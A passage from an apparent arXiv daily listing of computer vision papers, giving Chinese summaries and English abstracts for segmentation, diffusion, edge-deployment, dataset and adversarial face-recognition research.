state-of-the-art accuracy and strong generalization across diverse generative models.
[CV-31] Bridging the Geometry Mismatch: Frequency-Aware Anisotropic Serialization for Thin-Structure SSMs
【速读】:该论文旨在解决细长线状结构分割中因拓扑敏感性导致的长程连通性易受局部误差破坏的问题。现有状态空间模型(State-Space Models, SSMs)虽具备高效长程建模能力,但其各向同性的序列化方式(如栅格扫描)与各向异性目标几何特性不匹配,造成状态传播偏离结构轨迹而非沿其方向进行。解决方案的关键在于提出FGOS-Net框架,通过频率-几何解耦机制将特征分解为稳定拓扑载体与方向性高频带,利用高频成分显式校正下采样引起的空间错位;在此基础上引入频率对齐扫描策略,使序列化过程变为几何条件化的决策,从而保持方向一致性轨迹;同时结合主动探测策略选择性注入高频细节并抑制纹理歧义,显著提升分割精度与效率。
链接: https://arxiv.org/abs/2603.28503
作者: Jin Bai,Huiyao Zhang,Qi Wen,Ningyang Li,Shengyang Li,Atta ur Rahman,Xiaolin Tian
机构: 1. Tsinghua University (清华大学); 2. Institute of Automation, Chinese Academy of Sciences (中国科学院自动化研究所); 3. University of Engineering and Technology (工程与技术大学); 4. Beijing Institute of Technology (北京理工大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:The segmentation of thin linear structures is inherently topology allowbreak-critical, where minor local errors can sever long-range connectivity. While recent State-Space Models (SSMs) offer efficient long-range modeling, their isotropic serialization (e.g., raster scanning) creates a geometry mismatch for anisotropic targets, causing state propagation across rather than along the structure trajectories. To address this, we propose FGOS-Net, a framework based on frequency allowbreak-geometric disentanglement. We first decompose features into a stable topology carrier and directional high-frequency bands, leveraging the latter to explicitly correct spatial misalignments induced by downsampling. Building on this calibrated topology, we introduce frequency-aligned scanning that elevates serialization to a geometry-conditioned decision, preserving direction-consistent traces. Coupled with an active probing strategy to selectively inject high-frequency details and suppress texture ambiguity, FGOS-Net consistently outperforms strong baselines across four challenging benchmarks. Notably, it achieves 91.3% mIoU and 97.1% clDice on DeepCrack while running at 80 FPS with only 7.87 GFLOPs.
[CV-32] ConceptWeaver: Weaving Disentangled Concepts with Flow
【速读】:该论文旨在解决预训练流模型(flow-based models)在生成复杂场景时缺乏直接机制以从单张真实世界图像中解耦并定制潜在概念的问题。其核心挑战在于如何实现对生成过程中不同层次语义信息的精准控制,尤其是在不依赖大量数据的情况下进行内容编辑与合成。解决方案的关键在于发现并利用生成过程的三阶段特性:初始的蓝图阶段(Blueprint Stage)建立低频结构,随后的实例化阶段(Instantiation Stage)使内容概念达到峰值强度并自然解耦,最终的细化阶段(refinement stage)负责细节生成。基于此洞察,作者提出ConceptWeaver框架,通过阶段感知优化策略从单参考图像中学习特定概念的语义偏移,并借助新颖的概念编织引导机制(ConceptWeaver Guidance, CWG),在推理时将这些偏移量精确注入到对应的生成阶段,从而实现高保真、可组合的内容编辑与合成。
链接: https://arxiv.org/abs/2603.28493
作者: Jintao Chen,Aiming Hao,Xiaoqing Chen,Chengyu Bai,Chubin Chen,Yanxun Li,Jiahong Wu,Xiangxiang Chu,Shanghang Zhang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Pre-trained flow-based models excel at synthesizing complex scenes yet lack a direct mechanism for disentangling and customizing their underlying concepts from one-shot real-world sources. To demystify this process, we first introduce a novel differential probing technique to isolate and analyze the influence of individual concept tokens on the velocity field over time. This investigation yields a critical insight: the generative process is not monolithic but unfolds in three distinct stages. An initial \textbfBlueprint Stage establishes low-frequency structure, followed by a pivotal \textbfInstantiation Stage where content concepts emerge with peak intensity and become naturally disentangled, creating an optimal window for manipulation. A final concept-insensitive refinement stage then synthesizes fine-grained details. Guided by this discovery, we propose \textbfConceptWeaver, a framework for one-shot concept disentanglement. ConceptWeaver learns concept-specific semantic offsets from a single reference image using a stage-aware optimization strategy that aligns with the three-stage framework. These learned offsets are then deployed during inference via our novel ConceptWeaver Guidance (CWG) mechanism, which strategically injects them at the appropriate generative stage. Extensive experiments validate that ConceptWeaver enables high-fidelity, compositional synthesis and editing, demonstrating that understanding and leveraging the intrinsic, staged nature of flow models is key to unlocking precise, multi-granularity content manipulation.
[CV-33] INSID3: Training-Free In-Context Segmentation with DINOv3 CVPR2026
【速读】:该论文旨在解决上下文分割(In-context Segmentation, ICS)中面临的两大核心挑战:一是现有方法依赖微调视觉基础模型(Vision Foundation Models, VFMs),虽提升域内性能但损害泛化能力;二是多冻结VFMs组合方案虽保留泛化性,却引入架构复杂度且分割粒度固定。其解决方案的关键在于提出一种无需训练的极简框架INSID3,利用DINOv3预训练的稠密自监督特征(dense self-supervised features)直接实现语义匹配与分割,无需任何掩码或类别级监督信号,即可在单个冻结骨干网络下支持不同粒度的分割任务(如语义、部件和个性化实例分割),在保持高精度的同时显著降低参数量(减少3倍)。
链接: https://arxiv.org/abs/2603.28480
作者: Claudia Cuttano,Gabriele Trivigno,Christoph Reich,Daniel Cremers,Carlo Masone,Stefan Roth
机构: Politecnico di Torino (都灵理工大学); TU Darmstadt (达姆施塔特工业大学); TU Munich (慕尼黑工业大学); hessian.AI (黑森人工智能); ELIZA (ELIZA); MCML (MCML)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR 2026. Project page: this https URL
Abstract:In-context segmentation (ICS) aims to segment arbitrary concepts, e.g., objects, parts, or personalized instances, given one annotated visual examples. Existing work relies on (i) fine-tuning vision foundation models (VFMs), which improves in-domain results but harms generalization, or (ii) combines multiple frozen VFMs, which preserves generalization but yields architectural complexity and fixed segmentation granularities. We revisit ICS from a minimalist perspective and ask: Can a single self-supervised backbone support both semantic matching and segmentation, without any supervision or auxiliary models? We show that scaled-up dense self-supervised features from DINOv3 exhibit strong spatial structure and semantic correspondence. We introduce INSID3, a training-free approach that segments concepts at varying granularities only from frozen DINOv3 features, given an in-context example. INSID3 achieves state-of-the-art results across one-shot semantic, part, and personalized segmentation, outperforming previous work by +7.5 % mIoU, while using 3x fewer parameters and without any mask or category-level supervision. Code is available at this https URL .
[CV-34] CiQi-Agent : Aligning Vision Tools and Aesthetics in Multimodal Agent for Cultural Reasoning on Chinese Porcelains
【速读】:该论文旨在解决古陶瓷鉴定领域专业门槛高、非专业人士难以参与的问题,同时辅助专家提升鉴定效率与准确性。其核心挑战在于如何实现对古代瓷器在六个关键属性(朝代、年号、窑口、釉色、纹饰、器型)上的细粒度分析,并生成可解释的、基于视觉与文本证据融合的鉴定描述。解决方案的关键在于构建了一个名为CiQi-Agent的专用陶瓷鉴赏智能代理,该代理结合多图像输入、视觉工具调用和多模态检索增强生成机制,通过监督微调、强化学习及工具增强推理框架训练而成;此外,研究还创建了大规模专家标注数据集CiQi-VQA(含29,596件瓷器、51,553张图像和557,940个视觉问答对)以及基准测试集CiQi-Bench,为模型性能评估提供标准化依据。实验表明,CiQi-Agent(7B)在所有六项属性上均显著优于主流开源与闭源模型,平均准确率高出GPT-5达12.2%。
链接: https://arxiv.org/abs/2603.28474
作者: Wenhan Wang,Zhixiang Zhou,Zhongtian Ma,Yanzhu Chen,Ziyu Lin,Hao Sheng,Pengfei Liu,Honglin Ma,Wenqi Shao,Qiaosheng Zhang,Yu Qiao
机构: Shanghai Innovation Institute (上海创新研究院); Shanghai AI Laboratory (上海人工智能实验室); Shaanxi Academy of Cultural Relics Conservation (陕西省文物考古研究院)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:The connoisseurship of antique Chinese porcelain demands extensive historical expertise, material understanding, and aesthetic sensitivity, making it difficult for non-specialists to engage. To democratize cultural-heritage understanding and assist expert connoisseurship, we introduce CiQi-Agent – a domain-specific Porcelain Connoisseurship Agent for intelligent analysis of antique Chinese porcelain. CiQi-Agent supports multi-image porcelain inputs and enables vision tool invocation and multimodal retrieval-augmented generation, performing fine-grained connoisseurship analysis across six attributes: dynasty, reign period, kiln site, glaze color, decorative motif, and vessel shape. Beyond attribute classification, it captures subtle visual details, retrieves relevant domain knowledge, and integrates visual and textual evidence to produce coherent, explainable connoisseurship descriptions. To achieve this capability, we construct a large-scale, expert-annotated dataset CiQi-VQA, comprising 29,596 porcelain specimens, 51,553 images, and 557,940 visual question–answering pairs, and further establish a comprehensive benchmark CiQi-Bench aligned with the previously mentioned six attributes. CiQi-Agent is trained through supervised fine-tuning, reinforcement learning, and a tool-augmented reasoning framework that integrates two categories of tools: a vision tool and multimodal retrieval tools. Experimental results show that CiQi-Agent (7B) outperforms all competitive open- and closed-source models across all six attributes on CiQi-Bench, achieving on average 12.2% higher accuracy than GPT-5. The model and dataset have been released and are publicly available at this https URL.
[CV-35] Post-hoc Self-explanation of CNNs
【速读】:该论文旨在解决标准卷积神经网络(Convolutional Neural Networks, CNNs)在解释性方面的局限性,即其内置原型无法准确反映数据特征的问题。传统CNN虽可数学上重构成自解释模型(Self-Explainable Models, SEMs),但缺乏对决策过程的语义清晰解释。解决方案的关键在于:用基于k-means的分类器替代最终线性层,从而在不牺牲模型性能的前提下提升可解释性;进一步提出统一的形式化方法,对分类器、编码器最后一层输出(B4)及中间特征激活组合进行后验解释,尤其通过利用卷积感受野的空间一致性,生成基于概念的解释图谱,辅以无梯度的特征归因图支持,实现更直观且语义一致的模型解释。
链接: https://arxiv.org/abs/2603.28466
作者: Ahcène Boubekki,Line H. Clemmensen
机构: University of Copenhagen (哥本哈根大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (stat.ML)
备注:
Abstract:Although standard Convolutional Neural Networks (CNNs) can be mathematically reinterpreted as Self-Explainable Models (SEMs), their built-in prototypes do not on their own accurately represent the data. Replacing the final linear layer with a k -means-based classifier addresses this limitation without compromising performance. This work introduces a common formalization of k -means-based post-hoc explanations for the classifier, the encoder’s final output (B4), and combinations of intermediate feature activations. The latter approach leverages the spatial consistency of convolutional receptive fields to generate concept-based explanation maps, which are supported by gradient-free feature attribution maps. Empirical evaluation with a ResNet34 shows that using shallower, less compressed feature activations, such as those from the last three blocks (B234), results in a trade-off between semantic fidelity and a slight reduction in predictive performance.
[CV-36] Decoupling Wavelet Sub-bands for Single Source Domain Generalization in Fundus Image Segmentation
【速读】:该论文旨在解决眼底图像(fundus imaging)中域泛化(domain generalization, DG)问题,即深度学习模型在面对不同设备和临床场景下的数据分布变化时性能下降的问题。由于跨域标注数据获取成本高且受隐私限制,现有单源域泛化(single-source domain generalization, SDG)方法往往无法有效捕捉解剖拓扑结构或分离外观特征与解剖特征。其解决方案的关键在于提出WaveSDG网络,通过小波子带分解(wavelet sub-band decomposition)实现解剖结构与域特定外观的解耦;创新性地设计了基于小波的不变结构提取与精炼模块(Wavelet-based Invariant Structure Extraction and Refinement, WISER),利用各小波子带的不同语义角色:低频分量用于锚定全局解剖结构,高频分量则选择性增强方向边缘并抑制噪声,从而提升模型在未见域上的准确性和鲁棒性。
链接: https://arxiv.org/abs/2603.28463
作者: Shramana Dey,Varun Ajith,Abhirup Banerjee,Sushmita Mitra
机构: Indian Statistical Institute (印度统计研究所); University of Oxford (牛津大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Domain generalization in fundus imaging is challenging due to variations in acquisition conditions across devices and clinical settings. The inability to adapt to these variations causes performance degradation on unseen domains for deep learning models. Besides, obtaining annotated data across domains is often expensive and privacy constraints restricts their availability. Although single-source domain generalization (SDG) offers a realistic solution to this problem, the existing approaches frequently fail to capture anatomical topology or decouple appearance from anatomical features. This research introduces WaveSDG, a new wavelet-guided segmentation network for SDG. It decouples anatomical structure from domain-specific appearance through a wavelet sub-band decomposition. A novel Wavelet-based Invariant Structure Extraction and Refinement (WISER) module is proposed to process encoder features by leveraging distinct semantic roles of each wavelet sub-band. The module refines low-frequency components to anchor global anatomy, while selectively enhancing directional edges and suppressing noise within the high-frequency sub-bands. Extensive ablation studies validate the effectiveness of the WISER module and its decoupling strategy. Our evaluations on optic cup and optic disc segmentation across one source and five unseen target datasets show that WaveSDG consistently outperforms seven state-of-the-art methods. Notably, it achieves the best balanced Dice score and lowest 95th percentile Hausdorff distance with reduced variance, indicating improved accuracy, robustness, and cross-domain stability.
[CV-37] R_dm: Re-conceptualizing Distribution Matching as a Reward for Diffusion Distillation
【速读】:该论文旨在解决扩散模型(Diffusion Models)在生成过程中因迭代采样速度慢而导致的效率瓶颈问题,尤其是在使用扩散蒸馏(Diffusion Distillation)技术实现少步生成时,传统方法受限于仅以教师模型为锚点的蒸馏目标,难以突破性能上限。其解决方案的关键在于提出一种全新的范式——将分布匹配(Distribution Matching)重新定义为奖励信号 $ R_{dm} $,从而统一扩散蒸馏与强化学习(Reinforcement Learning, RL)的优化框架。该设计通过引入组归一化分布匹配(Group Normalized Distribution Matching, GNDM)提升奖励估计的稳定性,并支持灵活的多奖励融合机制和重要性采样(Importance Sampling, IS),显著提升了采样效率与生成质量,在FID指标上相比基线降低1.87,同时在美学质量与保真度之间取得更优平衡。
链接: https://arxiv.org/abs/2603.28460
作者: Linqian Fan,Peiqin Sun,Tiancheng Wen,Shun Lu,Chengru Song
机构: Kling Team, Kuaishou Technology (快手科技); Tsinghua University (清华大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注:
Abstract:Diffusion models achieve state-of-the-art generative performance but are fundamentally bottlenecked by their slow iterative sampling process. While diffusion distillation techniques enable high-fidelity few-step generation, traditional objectives often restrict the student’s performance by anchoring it solely to the teacher. Recent approaches have attempted to break this ceiling by integrating Reinforcement Learning (RL), typically through a simple summation of distillation and RL objectives. In this work, we propose a novel paradigm by reconceptualizing distribution matching as a reward, denoted as R_dm . This unified perspective bridges the algorithmic gap between Diffusion Matching Distillation (DMD) and RL, providing several key benefits. (1) Enhanced optimization stability: we introduce Group Normalized Distribution Matching (GNDM), which adapts standard RL group normalization to stabilize R_dm estimation. By leveraging group-mean statistics, GNDM establishes a more robust and effective optimization direction. (2) Seamless reward integration: our reward-centric formulation inherently supports adaptive weighting mechanisms, allowing flexible combination of DMD with external reward models. (3) Improved sampling efficiency: by aligning with RL principles, the framework readily incorporates importance sampling (IS), leading to a significant boost in sampling efficiency. Extensive experiments demonstrate that GNDM outperforms vanilla DMD, reducing the FID by 1.87. Furthermore, our multi-reward variant, GNDMR, surpasses existing baselines by achieving a strong balance between aesthetic quality and fidelity, reaching a peak HPS of 30.37 and a low FID-SD of 12.21. Overall, R_dm provides a flexible, stable, and efficient framework for real-time high-fidelity synthesis. Code will be released upon publication.
[CV-38] FeDMRA: Federated Incremental Learning with Dynamic Memory Replay Allocation
【速读】:该论文旨在解决联邦医疗系统中联邦类增量学习(Federated Class-Incremental Learning, FCIL)面临的挑战,特别是当分布式客户端数据呈现非独立同分布(non-IID)特性时,传统持续学习方法因无法有效应对数据异构性而失效的问题。解决方案的关键在于提出一种基于数据回放机制的动态示例存储(exemplar storage)内存分配策略,该策略通过挖掘数据异构性的内在潜力并兼顾各参与客户端的性能公平性,实现有限存储资源在客户端间的合理分配,从而缓解灾难性遗忘(catastrophic forgetting),提升整体模型适应性和稳定性。
链接: https://arxiv.org/abs/2603.28455
作者: Tiantian Wang,Xiang Xiang,Simon S. Du
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Distributed, Parallel, and Cluster Computing (cs.DC); Machine Learning (stat.ML)
备注:
Abstract:In federated healthcare systems, Federated Class-Incremental Learning (FCIL) has emerged as a key paradigm, enabling continuous adaptive model learning among distributed clients while safeguarding data privacy. However, in practical applications, data across agent nodes within the distributed framework often exhibits non-independent and identically distributed (non-IID) characteristics, rendering traditional continual learning methods inapplicable. To address these challenges, this paper covers more comprehensive incremental task scenarios and proposes a dynamic memory allocation strategy for exemplar storage based on the data replay mechanism. This strategy fully taps into the inherent potential of data heterogeneity, while taking into account the performance fairness of all participating clients, thereby establishing a balanced and adaptive solution to mitigate catastrophic forgetting. Unlike the fixed allocation of client exemplar memory, the proposed scheme emphasizes the rational allocation of limited storage resources among clients to improve model performance. Furthermore, extensive experiments are conducted on three medical image datasets, and the results demonstrate significant performance improvements compared to existing baseline models.
[CV-39] GeoHCC: Local Geometry-Aware Hierarchical Context Compression for 3D Gaussian Splatting
【速读】:该论文旨在解决3D高斯溅射(3D Gaussian Splatting, 3DGS)在实际部署中因存储开销过大而导致的瓶颈问题,尤其是现有基于锚点(anchor-based)的压缩方法忽视显式几何依赖关系,造成结构退化和率失真性能不佳的问题。解决方案的关键在于提出GeoHCC框架,其核心创新包括:一是引入邻域感知锚点剪枝(Neighborhood-Aware Anchor Pruning, NAAP),通过加权邻域特征聚合评估锚点重要性并合并冗余锚点,从而获得紧凑且几何一致的锚点集;二是设计分层熵编码机制,利用轻量级几何引导卷积(Geometry-Guided Convolution, GG-Conv)构建从粗到细的上下文先验,实现空间自适应建模与率失真优化,显著提升几何保真度和渲染质量。
链接: https://arxiv.org/abs/2603.28431
作者: Xuan Deng,Xiandong Meng,Hengyu Man,Qiang Zhu,Tiange Zhang,Debin Zhao,Xiaopeng Fan
机构: Harbin Institute of Technology (哈尔滨工业大学); Peng Cheng Laboratory (鹏城实验室); Harbin Institute of Technology Suzhou Research Institute (哈尔滨工业大学苏州研究院)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: 10
Abstract:Although 3D Gaussian Splatting (3DGS) enables high-fidelity real-time rendering, its prohibitive storage overhead severely hinders practical deployment. Recent anchor-based 3DGS compression schemes reduce redundancy through context modeling, yet overlook explicit geometric dependencies, leading to structural degradation and suboptimal rate-distortion performance. In this paper, we propose GeoHCC, a geometry-aware 3DGS compression framework that incorporates inter-anchor geometric correlations into anchor pruning and entropy coding for compact representation. We first introduce Neighborhood-Aware Anchor Pruning (NAAP), which evaluates anchor importance via weighted neighborhood feature aggregation and merges redundant anchors into salient neighbors, yielding a compact yet geometry-consistent anchor set. Building upon this optimized structure, we further develop a hierarchical entropy coding scheme, in which coarse-to-fine priors are exploited through a lightweight Geometry-Guided Convolution (GG-Conv) operator to enable spatially adaptive context modeling and rate-distortion optimization. Extensive experiments demonstrate that GeoHCC effectively resolves the structure preservation bottleneck, maintaining superior geometric integrity and rendering fidelity over state-of-the-art anchor-based approaches.
[CV-40] -Catch: Adaptive Teleoperation for Dexterous Dynamic 3D Object Catching
【速读】:该论文旨在解决动态物体抓取任务中纯遥操作(teleoperation)因时序、姿态和力控误差导致的失败问题,其核心挑战在于如何在物体运动过程中实现高精度、鲁棒的手部操控。解决方案的关键在于提出Tele-Catch框架,其中包含两个核心技术:一是DAIM(Dynamics-aware Adaptive Integration Mechanism),通过将手套输入信号融合到扩散策略(diffusion policy)的去噪过程,根据交互对象状态自适应调节控制;二是DP-U3R,利用点云观测中的无监督几何表示增强扩散策略学习,实现几何感知决策。二者共同实现了人机协同自主(shared autonomy),显著提升了动态抓取任务的准确性和泛化能力。
链接: https://arxiv.org/abs/2603.28427
作者: Weiguang Zhao,Junting Dong,Rui Zhang,Kailin Li,Qin Zhao,Kaizhu Huang
机构: 未知
类目: Robotics (cs.RO); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Teleoperation is a key paradigm for transferring human dexterity to robots, yet most prior work targets objects that are initially static, such as grasping or manipulation. Dynamic object catch, where objects move before contact, remains underexplored. Pure teleoperation in this task often fails due to timing, pose, and force errors, highlighting the need for shared autonomy that combines human input with autonomous policies. To this end, we present Tele-Catch, a systematic framework for dexterous hand teleoperation in dynamic object catching. At its core, we design DAIM, a dynamics-aware adaptive integration mechanism that realizes shared autonomy by fusing glove-based teleoperation signals into the diffusion policy denoising process. It adaptively modulates control based on the interaction object state. To improve policy robustness, we introduce DP-U3R, which integrates unsupervised geometric representations from point cloud observations into diffusion policy learning, enabling geometry-aware decision making. Extensive experiments demonstrate that Tele-Catch significantly improves accuracy and robustness in dynamic catching tasks, while also exhibiting consistent gains across distinct dexterous hand embodiments and previously unseen object categories.
[CV-41] From Pixels to Reality: Physical-Digital Patch Attacks on Real-World Camera
【速读】:该论文旨在解决当前基于摄像头的认证系统(如人脸识别)在物理世界中面临的对抗攻击问题,尤其是传统打印类对抗样本在实际部署中存在部署效率低、跨模型迁移能力弱等局限。其解决方案的关键在于提出一种全新的数字-物理对抗攻击方法(Digital-Physical Adversarial Attacks, DiPA),即通过在智能手机屏幕上直接显示对抗补丁(adversarial patch),实现无需打印、快速部署且无需总变差正则化(total-variation regularization)的攻击方式。DiPA利用ArcFace、MagFace和CosFace等主流人脸识别模型的集成策略增强补丁在黑盒场景下的迁移性,并通过实时演示验证其在降低检测置信度、提升攻击成功率及扰动特征空间方面的显著优势,揭示了移动设备、普适视觉与传感器驱动认证基础设施之间的关键安全漏洞。
链接: https://arxiv.org/abs/2603.28425
作者: Victoria Leonenkova,Ekaterina Shumitskaya,Dmitriy Vatolin,Anastasia Antsiferova
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted to the PerCom 2026 Demo
Abstract:This demonstration presents Digital-Physical Adversarial Attacks (DiPA), a new class of practical adversarial attacks against pervasive camera-based authentication systems, where an attacker displays an adversarial patch directly on a smartphone screen instead of relying on printed artifacts. This digital-only physical presentation enables rapid deployment, removes the need for total-variation regularization, and improves patch transferability in black-box conditions. DiPA leverages an ensemble of state-of-the-art face-recognition models (ArcFace, MagFace, CosFace) to enhance transfer across unseen commercial systems. Our interactive demo shows a real-time dodging attack against a deployed face-recognition camera, preventing authorized users from being recognized while participants dynamically adjust patch patterns and observe immediate effects on the sensing pipeline. We further demonstrate DiPA’s superiority over existing physical attacks in terms of success rate, feature-space distortion, and reductions in detection confidence, highlighting critical vulnerabilities at the intersection of mobile devices, pervasive vision, and sensor-driven authentication infrastructures.
[CV-42] Unified Restoration-Perception Learning: Maritime Infrared-Visible Image Fusion and Segmentation
【速读】:该论文旨在解决海洋场景下由于雾和强反射等复杂因素导致的图像退化问题,这些问题严重削弱了语义感知的稳定性。现有图像增强与恢复方法通常仅针对特定退化类型或仅关注视觉质量,缺乏端到端协同机制以同时提升结构恢复与语义有效性;此外,公开的红外-可见光数据集多来自城市环境,无法真实反映海洋场景中耦合退化的特性。解决方案的关键在于提出一个名为Infrared-Visible Maritime Ship Dataset (IVMSD) 的新数据集,覆盖多种气象与光照条件下的海洋场景,并在此基础上构建多任务互补学习框架(Multi-task Complementary Learning Framework, MCLF),通过频率-空间增强互补模块(Frequency-Spatial Enhancement Complementary, FSEC)抑制退化并增强结构信息、语义-视觉一致性注意力模块(Semantic-Visual Consistency Attention, SVCA)提供语义一致引导、以及跨模态引导注意力机制实现选择性融合,从而在统一架构中协同完成图像恢复、多模态融合与语义分割任务,显著提升了复杂海洋环境下语义分割的鲁棒性和感知质量。
链接: https://arxiv.org/abs/2603.28414
作者: Weichao Cai,Weiliang Huang,Biao Xue,Chao Huang,Fei Yuan,Bob Zhang
机构: Xiamen University (厦门大学); University of Macau (澳门大学); Sun Yat-sen University (中山大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Marine scene understanding and segmentation plays a vital role in maritime monitoring and navigation safety. However, prevalent factors like fog and strong reflections in maritime environments cause severe image degradation, significantly compromising the stability of semantic perception. Existing restoration and enhancement methods typically target specific degradations or focus solely on visual quality, lacking end-to-end collaborative mechanisms that simultaneously improve structural recovery and semantic effectiveness. Moreover, publicly available infrared-visible datasets are predominantly collected from urban scenes, failing to capture the authentic characteristics of coupled degradations in marine environments. To address these challenges, the Infrared-Visible Maritime Ship Dataset (IVMSD) is proposed to cover various maritime scenarios under diverse weather and illumination conditions. Building upon this dataset, a Multi-task Complementary Learning Framework (MCLF) is proposed to collaboratively perform image restoration, multimodal fusion, and semantic segmentation within a unified architecture. The framework includes a Frequency-Spatial Enhancement Complementary (FSEC) module for degradation suppression and structural enhancement, a Semantic-Visual Consistency Attention (SVCA) module for semantic-consistent guidance, and a cross-modality guided attention mechanism for selective fusion. Experimental results on IVMSD demonstrate that the proposed method achieves state-of-the-art segmentation performance, significantly enhancing robustness and perceptual quality under complex maritime conditions.
[CV-43] EdgeDiT: Hardware-Aware Diffusion Transformers for Efficient On-Device Image Generation CVPR2026
【速读】:该论文旨在解决扩散 Transformer(Diffusion Transformers, DiT)在资源受限的边缘设备上部署时面临的计算复杂度高和内存占用大的问题,从而阻碍其在移动神经处理单元(Neural Processing Units, NPUs)上的本地化应用。解决方案的关键在于提出 EdgeDiT,一个面向移动端 NPU 的硬件感知优化框架,通过系统性识别并剪枝 DiT 主干结构中对移动数据流特别不利的冗余模块,实现模型轻量化:在不牺牲原始 Transformer 架构的扩展优势和表达能力的前提下,参数量减少 20–30%,浮点运算次数(FLOPs)降低 36–46%,设备端推理延迟降低 1.65 倍,同时在 Frechet Inception Distance(FID)与推理延迟之间实现了更优的帕累托前沿。
链接: https://arxiv.org/abs/2603.28405
作者: Sravanth Kodavanti,Manjunath Arveti,Sowmya Vajrala,Srinivas Miriyala,Vikram N R
机构: Samsung Research Institute Bangalore(三星研究院班加罗尔)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: Accepted at the Mobile AI Workshop, CVPR 2026
Abstract:Diffusion Transformers (DiT) have established a new state-of-the-art in high-fidelity image synthesis; however, their massive computational complexity and memory requirements hinder local deployment on resource-constrained edge devices. In this paper, we introduce EdgeDiT, a family of hardware-efficient generative transformers specifically engineered for mobile Neural Processing Units (NPUs), such as the Qualcomm Hexagon and Apple Neural Engine (ANE). By leveraging a hardware-aware optimization framework, we systematically identify and prune structural redundancies within the DiT backbone that are particularly taxing for mobile data-flows. Our approach yields a series of lightweight models that achieve a 20-30% reduction in parameters, a 36-46% decrease in FLOPs, and a 1.65-fold reduction in on-device latency without sacrificing the scaling advantages or the expressive capacity of the original transformer architecture. Extensive benchmarking demonstrates that EdgeDiT offers a superior Pareto-optimal trade-off between Frechet Inception Distance (FID) and inference latency compared to both optimized mobile U-Nets and vanilla DiT variants. By enabling responsive, private, and offline generative AI directly on-device, EdgeDiT provides a scalable blueprint for transitioning large-scale foundation models from high-end GPUs to the palm of the user.
[CV-44] SVH-BD : Synthetic Vegetation Hyperspectral Benchmark Dataset for Emulation of Remote Sensing Images
【速读】:该论文旨在解决植被性状反演与辐射传输模拟中的不确定性量化问题,特别是在高光谱遥感数据下如何实现精准、高效且物理一致的植被生物物理参数估计。其解决方案的关键在于构建了一个大规模合成高光谱图像立方体数据集(包含10,915个样本),每个立方体具有211个波段(400–2500 nm,分辨率10 nm)和固定的空间布局(64×64像素),并配以像素级植被性状地图(如叶面积指数、叶绿素含量等)。这些数据通过基于PROSAIL模型的查找表反演方法从Sentinel-2 Level-2A表面反射率推导出植被性状,并进一步利用正向PROSAIL模拟生成符合物理约束的高光谱反射率,从而保证了环境条件下的光谱-生物物理关系的真实性和可控性。此外,数据集还包含第5和第95百分位的不确定性图层及Sentinel-2场景分类层,为快速辐射传输模拟器开发、反演算法基准测试以及复杂生态区域中光谱-生物物理关系研究提供了可靠基础。
链接: https://arxiv.org/abs/2603.28390
作者: Chedly Ben Azizi,Claire Guilloteau,Gilles Roussel,Matthieu Puigt
机构: Univ. Littoral Côte d’Opale (滨海大学); LISIC – UR 4491 (信息与系统科学研究所)
类目: Computer Vision and Pattern Recognition (cs.CV); Signal Processing (eess.SP)
备注:
Abstract:This dataset provides a large collection of 10,915 synthetic hyperspectral image cubes paired with pixel-level vegetation trait maps, designed to support research in radiative transfer emulation, vegetation trait retrieval, and uncertainty quantification. Each hyperspectral cube contains 211 bands spanning 400–2500 nm at 10 nm resolution and a fixed spatial layout of 64 \times 64 pixels, offering continuous simulated surface reflectance spectra suitable for emulator development and machine-learning tasks requiring high spectral detail. Vegetation traits were derived by inverting Sentinel-2 Level-2A surface reflectance using a PROSAIL-based lookup-table approach, followed by forward PROSAIL simulations to generate hyperspectral reflectance under physically consistent canopy and illumination conditions. The dataset covers four ecologically diverse regions – East Africa, Northern France, Eastern India, and Southern Spain – and includes 5th and 95th percentile uncertainty maps as well as Sentinel-2 scene classification layers. This resource enables benchmarking of inversion methods, development of fast radiative transfer emulators, and studies of spectral–biophysical relationships under controlled yet realistic environmental variability.
[CV-45] Rethinking Structure Preservation in Text-Guided Image Editing with Visual Autoregressive Models
【速读】:该论文旨在解决基于视觉自回归模型(Visual Autoregressive, VAR)的文本引导图像编辑中存在的两个关键问题:一是准确定位可编辑的图像标记(token),二是保持编辑结果与源图像之间的结构一致性。解决方案的关键在于:首先提出一种粗到细的标记定位策略,以在编辑保真度与背景保留之间取得平衡;其次通过分析VAR模型中间特征分布,识别出与结构相关的特征,并设计了一种简单而有效的特征注入机制来增强结构一致性;最后引入基于强化学习的自适应特征注入方案,自动学习不同尺度和层的注入比例,从而协同优化编辑保真度与结构保留效果。
链接: https://arxiv.org/abs/2603.28367
作者: Tao Xia,Jiawei Liu,Yukun Zhang,Ting Liu,Wei Wang,Lei Zhang
机构: Beijing Institute of Technology (北京理工大学); Shenyang Institute of Automation, CAS (中国科学院沈阳自动化研究所); Meitu Inc, MTLab (美图公司MTLab)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Visual autoregressive (VAR) models have recently emerged as a promising family of generative models, enabling a wide range of downstream vision tasks such as text-guided image editing. By shifting the editing paradigm from noise manipulation in diffusion-based methods to token-level operations, VAR-based approaches achieve better background preservation and significantly faster inference. However, existing VAR-based editing methods still face two key challenges: accurately localizing editable tokens and maintaining structural consistency in the edited results. In this work, we propose a novel text-guided image editing framework rooted in an analysis of intermediate feature distributions within VAR models. First, we introduce a coarse-to-fine token localization strategy that can refine editable regions, balancing editing fidelity and background preservation. Second, we analyze the intermediate representations of VAR models and identify structure-related features, by which we design a simple yet effective feature injection mechanism to enhance structural consistency between the edited and source images. Third, we develop a reinforcement learning-based adaptive feature injection scheme that automatically learns scale- and layer-specific injection 